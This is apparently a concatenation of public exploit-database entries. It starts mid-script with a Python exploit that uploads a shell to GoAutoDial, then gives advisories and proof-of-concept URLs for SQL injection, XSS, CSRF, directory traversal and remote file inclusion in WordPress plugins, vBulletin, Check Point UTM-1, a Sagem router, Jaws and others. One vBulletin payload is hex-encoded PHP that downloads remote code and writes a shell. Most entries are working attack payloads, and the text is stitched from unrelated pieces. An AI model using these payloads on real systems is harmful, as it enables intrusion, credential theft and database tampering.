'/manager_send.php?enable_sipsak_messages=1&allow_sipsak_messages=1&protocol=sip&ACTION=OriginateVDRelogin&session_name=AAAAAAAAAAAA&server_ip=%27%20OR%20%271%27%20%3D%20%271&extension=%3B' + command + '%3B&user=' + user + '&pass=' + password s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((host,80)) evilREQ = 'GET ' + evil + ' HTTP/1.1' + CRLF + 'Host: ' + host + CRLF + 'User-Agent: Infogen-AL' + CRLF + CRLF + CRLF s.send(evilREQ) a = s.recv(1024) if(a.find("HTTP/1.1 200 OK") != -1 and a.find("Invalid") == -1): print '[ + ] Shell uploaded successfully [ + ]\n' print '[ + ] http://' + host + '/infogen.php [ + ]\n' else: print '[ - ] Shell upload failed.... [ - ]' s.close() if(len(sys.argv) < 4): print '\n Usage : exploit.py 127.0.0.1 /goautodial-agent/ agentuser agentpassword\n' else: host = sys.argv[1] path = sys.argv[2] user = sys.argv[3] password = sys.argv[4] checkvuln() print 'Visit Us : http://infogen.al/'

[+] Calculated Fields Form Wordpress Plugin <= 1.0.10 - Remote SQL Injection Vulnerability [+] Author: Ibrahim Raafat [+] Twitter: https://twitter.com/RaafatSEC [+] Plugin: https://wordpress.org/plugins/calculated-fields-form/ [+] TimeLine [-] Feb 6 2015, The vulnerabilities reported [-] Feb 7 2015, Response and Confirming the vulnerabilities [-] Feb 8 2015, First fixing released to version 1.0.11 [-] Feb 17 2015, CSRF protection added to version 1.0.12 [-] March 1 2015, Public Disclosure [+] Download: https://downloads.wordpress.org/plugin/calculated-fields-form.1.0.10.zip [+] Description: There are sql injection vulnerabilities in Calculated Fields Form Plugin which could allow the attacker to execute sql queries into database [+] Vulnerable Code: [Red] https://plugins.trac.wordpress.org/changeset/1084937/calculated-fields-form [+] POC: /wp-admin/options-general.php?page=cp_calculated_fields_form&u=2 and 1=1&name=InsertText /wp-admin/options-general.php?page=cp_calculated_fields_form&u=2 or 1=1&name=InsertText // Will update all /wp-admin/options-general.php?page=cp_calculated_fields_form&c=21 and 1=1 /wp-admin/options-general.php?page=cp_calculated_fields_form&d=3 and 1=2 Delete These queries are execute without any csrf protection, The attacker can use this csrf vulnerability to execute queries in the sql by sending malicious page to the logged in admin [+] Impact: Attacker can use this vulnerabilities to update admin password [+] Recommendation: If you are using 1.0.12 or less, Upgrade the plugin ASAP [+] @lnxg33k Enta Sa3eed Bahlol?

source: https://www.securityfocus.com/bid/50096/info The Pretty Link plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. Pretty Link Plugin 1.4.56 is vulnerable; other versions may also be affected. http://www.example.com/wp-content/plugins/pretty-link/classes/views/prli-clicks/head.php?min_date=%3Cscript%3Ealert%28d ocument.cookie%29;%3C/script%3E http://www.example.com/wp-content/plugins/pretty-link/classes/views/prli-dashboard-widget/widget.php?message=%3Cscript% 3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/wp-content/plugins/pretty-link/classes/views/prli-links/form.php?prli_blogurl=%3Cscript%3Ealert% 28document.cookie%29;%3C/script%3E http://www.example.com/wp-content/plugins/pretty-link/classes/views/shared/errors.php?errors[]=%3Cscript%3Ealert%28docu ment.cookie%29;%3C/script%3E http://www.example.com/wp-content/plugins/pretty-link/classes/views/shared/table-nav.php?page_count=2&page_first_re cord=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

################################################################################################################# [+] Exploit Title: vBulletin 4.x.x 'visitormessage.php' Remote Code Injection Vulnerability [+] Discovered By: Dariush Nasirpour (Net.Edit0r) [+] My Homepage: black-hg.org / nasirpour.info [+] Date: [2015 27 February] [+] Vendor Homepage: vBulletin.com [+] Tested on: [vBulletin 4.2.2] [+] Greeting : Ali Razmjoo - Ehsan Nezami - Arash Shams - Ramin Shahkar and all my freinds ( #bhg ) ################################################################################################################# Remote Code Injection: +++++++++++++++++++++++++ 1) You Must Register In The vBulletin http://server/register.php example:[blackhat] 2) go to your user profile example: [http://server/members/blackhat.html] 3) post something in visitor message and record post data with live http header [example] : message_backup=&message=For-Test-Sample&wysiwyg=1&sbutton=%D8%A7%D8%B1%D8%B3%D8%A7%D9%84+%D9%BE%DB%8C%D8%BA%D8%A7%D9%85&fromquickcomment= 1&s=&securitytoken=1425024074-5bcfb5b83d466416ed95e80021abee86063cdf6e&do=message&u=110&u2=&loggedinuser=110&parseurl=1&lastcomment=1425022046&allow_ajax_qc=1&fromconverse= 4- change message to anything "For-Test-Sample" => "ALEEEEEEEEX" [because vBulletin don't let you send same comment in a time] [Now post this with hackbar:] URL: http://server/visitormessage.php?do=message [Post data] message_backup=&message=ALEEEEEEEEX&wysiwyg=1&sbutton=%D8%A7%D8%B1%D8%B3%D8%A7%D9%84+%D9%BE%DB%8C%D8%BA%D8%A7%D9%85&fromquickcomment= 1&s=&securitytoken=1425024074-5bcfb5b83d466416ed95e80021abee86063cdf6e&do=message&u=110&u2=&loggedinuser=110&parseurl=1&lastcomment=1425022046&allow_ajax_qc=1&fromconverse= [And referrer data:] PoC : http://server/members/blackhat.html?a=$stylevar[${${file_put_contents("shell.php","hacked")}}] [Example referrer data:] > upload downloader.php and s.php PoC : http://server/members/g3n3rall.html?a=$stylevar%5b$%7b$%7bfile_put_contents( "downloader.php","\x3C\x3F\x70\x68\x70\x0D\x0A\x24\x68\x6F\x6D\x65\x70\x61\x67\x65\x20\x3D\x20\x66\x69\x6C\x65\x5F\x67\x65\x74\x5F\x63\x6F\x6E\x74\x65\x6E\x74\x73\x28\x27\x68\x74\x74\x70\x3A\x2F\x2F\x70\x61\x69\x65\x6E\x63\x68\x61\x74\x2E\x63\x6F\x6D\x2F\x64\x2F\x64\x72\x2E\x74\x78\x74\x27\x29\x3B\x0D\x0A\x24\x66\x20\x3D\x20\x66\x6F\x70\x65\x6E\x28\x27\x73\x2E\x70\x68\x70\x27\x2C\x27\x77\x27\x29\x3B\x0D\x0A\x66\x77\x72\x69\x74\x65\x28\x24\x66\x2C\x24\x68\x6F\x6D\x65\x70\x61\x67\x65\x29\x3B\x0D\x0A\x3F\x3E")}}] 5- Open hackbar and tamper it with taper data: referrer data has been URL encoded by browser , you have to replace this again with tamper data: http://server/members/blackhat.html?a=$stylevar[${${file_put_contents("shell.php","hacked")}}] and submit request. ################################################################################################################

source: https://www.securityfocus.com/bid/50108/info G-WAN is prone to a buffer-overflow vulnerability and a denial-of-service vulnerability. Remote attackers can exploit these issues to execute arbitrary code in the context of the application or crash the affected application. G-WAN 2.10.6 is vulnerable; other versions may also be affected. while: do echo -e "GET /aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\r\n\r\n'

source: https://www.securityfocus.com/bid/50133/info PROMOTIC is prone to multiple security vulnerabilities. Exploiting these issues may allow remote attackers to execute arbitrary code within the context of the affected application or disclose sensitive information. PROMOTIC 8.1.3 is vulnerable; other versions may also be affected. http://www.example.com/webdir/..\..\..\..\..\boot.ini

source: https://www.securityfocus.com/bid/50167/info asgbookphp is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary HTML and script code in an unsuspecting user's browser in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. http://code.google.com/p/asgbookphp/ asgbookphp 1.9 is vulnerable; other versions may also be affected. http://www.example.com/asgbookphp/index.php/>'><ScRiPt>alert(771818860)</ScRiPt>

source: https://www.securityfocus.com/bid/50168/info Multiple Toshiba e-Studio devices are prone to a security-bypass vulnerability. Successful exploits will allow attackers to bypass certain security restrictions and gain access in the context of the device. http://www.example.com/TopAccess//Administrator/Setup/ScanToFile/List.htm

source: https://www.securityfocus.com/bid/50141/info Xenon is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. http://www.example.com/news_detail.php?id=-9+union+select+0,1,2,3,group_concat%28table_name%29,5+from+information_schema.tables http://www.example.com/viewstory.php?id=-8+and+1=1+union+select+0,1,2,group_concat%28column_name%29,4+from+information_schema.columns+where+table_name=0x7573657273 http://www.example.com/event.php?id=-153+union+select+0,1,2,3,4,5,6,7,8,group_concat%28table_name%29,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.tables

source: https://www.securityfocus.com/bid/50189/info Check Point UTM-1 Edge and Safe are prone to multiple security vulnerabilities, including: 1. Multiple cross-site scripting vulnerabilities 2. Multiple HTML-injection vulnerabilities 3. Multiple cross-site request forgery vulnerabilities 4. Multiple URI-redirection vulnerabilities 5. An information-disclosure vulnerability An attacker may leverage these issues to access sensitive information, redirect an unsuspecting victim to an attacker-controlled site, or steal cookie-based authentication credentials, to perform unauthorized actions in the context of a user's session. Versions prior to Check Point UTM-1 Edge and Safe 8.2.44 are vulnerable. Tested on versions 7.5.48x, 8.1.46x and 8.2.2x. 1) The following demonstrate the reflective XSS flaws:- a) The Ufp.html page is vulnerable to XSS via the url parameter It works by submitting a malicious url parameter to the ufp.html page http://www.example.com/pub/ufp.html?url=";><script>alert(1)</script>&mask=000&swpreview=1 This works with firmware versions 7.5.48x, 8.1.46x and 8.2.2x. b) The login page is also vulnerable to an XSS via the malicious session cookie It works by submitting a malicious session cookie to the login page Cookie: session="><script>alert(1)</script> c) An authenticated XSS exists within the diagnostics command http://www.example.com/diag_command.html?sw__ver=blah1&swdata=blah2&sw__custom='";);alert(1);// (this might need to be submitted twice) 2) The following demonstrate the persistent XSS flaws and XSRF flaws:- a) The blocked URL warning page is vulnerable to a persistent XSS attack placing any internal users at risk of attack when the page is displayed. First an attacker has to trick the administrator to follow a XSRF attack; the (swsessioncookie) session cookie for simplicity sake is shown though JavaScript document.cookie can be used to subvert this protection (see paper). http://www.example.com/UfpBlock.html?swcaller=UfpBlock.html&swsessioncookie=20KHYp5-oS7rKmS-a4rq4j&swsave=1&ufpblockhttps=0&ufpbreakframe=&backurl=WebRules.html&ufpblockterms=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E Firewall users then visiting blocked sites will have the blocked page displayed and the attack carried out. http://www.example.com/pub/ufp.html?url=www.blockedUrl.com&mask=000&swpreview=1 b) The Wi-Fi hotspot landing page on Wi-Fi enabled firewalls is also vulnerable, with any user using the Wi-Fi access point being at risk. First an attacker has to trick the administrator to follow a XSRF attack, the (swsessioncookie) session cookie for simplicity sake is shown though JavaScript document.cookie can be used to subvert this protection (see paper). http://www.example.com/HotSpot.html?swcaller=HotSpot.html&swsessioncookie=20KHYp5-oS7rKmS-a4rq4j&swsave=1&hotspotnets=00000000000000000000000000000000000000&hotspotpass=1&hotspotmulti=1&hotspothttps=0&hotspotnet1=0&hotspotnet2=0&hotspotnet3=0&hotspotenf=0&hotspottitle=Welcome+to+My+HotSpot&hotspotterms=%22%3E%3Cscript%3Ealert%282%29%3C%2Fscript%3E&thotspotpass=on&thotspotmulti=on Firewall users then visiting the Wi-Fi landing page will then have the attack carried out. http://www.example.com/pub/hotspot.html?swpreview=1 3) The following demonstrate the (authenticated) offsite redirection flaws:- a) Enter the following URL to redirect http://www.example.com/12?swcaller=http://www.procheckup.com b) Enter the following URL and then press back button. http://www.example.com/UfpBlock.html?backurl=http://www.procheckup.com 4) The following demonstrate the Information disclosure flaws (no authentication needed) It was found that the /pub/test.html program disclosed information, regarding the patch level used, licensing and the MAC addresses to unauthenticated users. a) On early firmware versions 5.0.82x, 6.0.72x & 7.0.27x 7.5.48x Just requesting http:// www.example.com/pub/test.html is sufficient b) However this no longer worked on versions 8.1.46x & 8.2.26x however adding the URL parameter and a double quote bypassed this check https:// www.example.com/pub/test.html?url="

source: https://www.securityfocus.com/bid/50195/info Site@School is prone to multiple SQL-injection and cross-site scripting vulnerabilities. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. XSS: http://www.example.com/school/starnet/index.php?option=stats&suboption=&#039;"</style></script><script>alert(document.cookie)</script> http://www.example.com/school/starnet/index.php?option=pagemanager&suboption=newsection&site=&#039;"</style></script><script>alert(document.cookie)</script> http://www.example.com/school/starnet/index.php?option=modulemanager&modoption=edit&module_number="</style></script><script>alert(document.cookie)</script> http://www.example.com/school/starnet/index.php?option=modulemanager&module=&#039;"</style></script><script>alert(document.cookie)</script> SQL Injection: http://www.example.com/school/starnet/index.php?option=modulemanager&modoption=edit&module_number=[sql injection] http://www.example.com/school/starnet/index.php?option=modulemanager&module=[sql injection]

# Title : Sagem F@st 3304-V2 Directory Traversal Vulnerability # Vendor : http://www.sagemcom.com # Severity : High # Tested Router : Sagem F@st 3304-V2 (3304, other versions may also be affected) # Date : 2015-03-01 # Author : Loudiyi Mohamed # Contact : Loudiyi.2010@gmail.com # Blog : https://www.linkedin.com/pub/mohamed-loudiyi/86/81b/603 # Vulnerability description: Sagem Fast is an ADSL Router using a web management interface in order to change configuration settings. The router is Sagem Fast is an ADSL Router using a web management interface in order to change configuration settings. The web server of the router is vulnerable to directory traversal which allows reading files by sending encoded '../' requests. The vulnerability may be tested with the following command-line: curl -v4 http://192.168.1.1//../../../../../../../../../../etc/passwd Or directly from navigateur: http://192.168.1.1/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd http://192.168.1.1/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fproc%2fnet%2farp

# Exploit Title: [ wordpress theme photocrati 4.X.X SQL INJECTION ] # Google Dork: [ Designed by Photocrati ] also [powered by Photocrati] # Date: [23 / 09 / 2011 ] # Exploit Author: [ ayastar ] # Email : dmx-ayastar@hotmail.fr # Software Link: [ http://www.photocrati.com ] # Version: [4.X.X] # Tested on: [ windows 7 ] -------- details | ======================================================= Software : photocrati version : 4.X.X Risk : High remote : yes attacker can do a remote injection in site URL to get some sensitive information . almost all version are infected by this vunl. ======================================================= Exploit code : http://sitewordpress/wp-content/themes/[photocrati-Path-theme]/ecomm-sizes.php?prod_id=[SQL] greetz to all muslims and all tryag member's :) from morocco

# Exploit Title: WordPress: cp-multi-view-calendar.1.1.4 [SQL Injection vulnerabilities] # Date: 2015-02-28 # Google Dork: Index of /wordpress/wp-content/plugins/cp-multi-view-calendar # Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ] # Vendor Homepage: http://wordpress.dwbooster.com/ # Software Link: https://downloads.wordpress.org/plugin/cp-multi-view-calendar.1.1.4.zip # Version: 1.1.5 # Tested on: windows 7 ultimate + sqlmap 0.9. It's php aplication # OWASP Top10: A1-Injection # Mitigations: Upgrade to version 1.1.5 Greetz to Christian Uriel Mondragon Zarate Video demo of unauthenticated user sqli explotation vulnerability : ################################################################### ADMIN PAGE SQL INJECTION ------------------------------------------------- http://localhost/wordpress/wp-admin/admin-ajax.php?action=ajax_add_calendar sqlinjection in post parameter viewid ------------------------------------------------------------------- http://localhost/wordpress/wp-admin/admin-ajax.php?action=ajax_delete_calendar sqlinjection in post parameter id ######################################## UNAUTENTICATED SQL INJECTION ----------------------------------------------------------------- http://localhost/wordpress/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=1 sql injection in id parameter ----------------------------------------------------------------------- http://localhost/wordpress/?action=data_management&cpmvc_do_action=mvparse&f=datafeed&method=list&calid=1 datapost viewtype=list&list_order=asc vuln variable list_order ################################################################ CROSSITE SCRIPTING VULNERABILITY ---------------------------------------------------------- http://localhost/wordpress/?action=data_management&cpmvc_do_action=mvparse&weekstartday=alert(12)&f=edit&id=1 crosite script weekstartday parameter ################################################### ================================== time-line 26-02-2015: vulnerabilities found 27-02-2015: reported to vendor 28-02-2015: release new cp-multi-view-calendar version 1.1.4 28-02-2015: full disclousure ===================================

source: https://www.securityfocus.com/bid/50018/info BuzzScripts BuzzyWall is prone to an information-disclosure vulnerability because it fails to sufficiently validate user-supplied data. An attacker can exploit this issue to download local files in the context of the webserver process. This may allow the attacker to obtain sensitive information; other attacks are also possible. BuzzyWall 1.3.2 is vulnerable; other versions may also be affected. http://www.example.com/resolute.php?img=config.php

source: https://www.securityfocus.com/bid/50019/info The 'com_expedition' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/index.php?option=com_expedition&task=detail&id=-3235'

source: https://www.securityfocus.com/bid/50039/info GoAhead WebServer is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. GoAhead WebServer 2.18 is vulnerable; other versions may also be affected. POST /goform/AddAccessLimit HTTP/1.1 url=<script>alert(1337)</script>&group=test&method=3&ok=OK

source: https://www.securityfocus.com/bid/50022/info Jaws is prone to multiple remote file-include vulnerabilities because the application fails to sufficiently sanitize user-supplied input. Exploiting these issues may allow a remote attacker to obtain sensitive information or execute arbitrary script code in the context of the Web server process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible. Jaws 0.8.14 is vulnerable; other versions may also be affected. http://www.example.com/jaws/libraries/pear/MDB2.php?file_name=[RFI] http://www.example.com/jaws/libraries/pear/MDB2.php?file_name=[RFI] http://www.example.com/jaws/libraries/pear/Services/Weather.php?service=[RFI] http://www.example.com/jaws/libraries/pear/SOAP/Transport.php?transport_include=[RFI] http://www.example.com/jaws/libraries/pear/Crypt/RSA/MathLoader.php?class_filename=[RFI]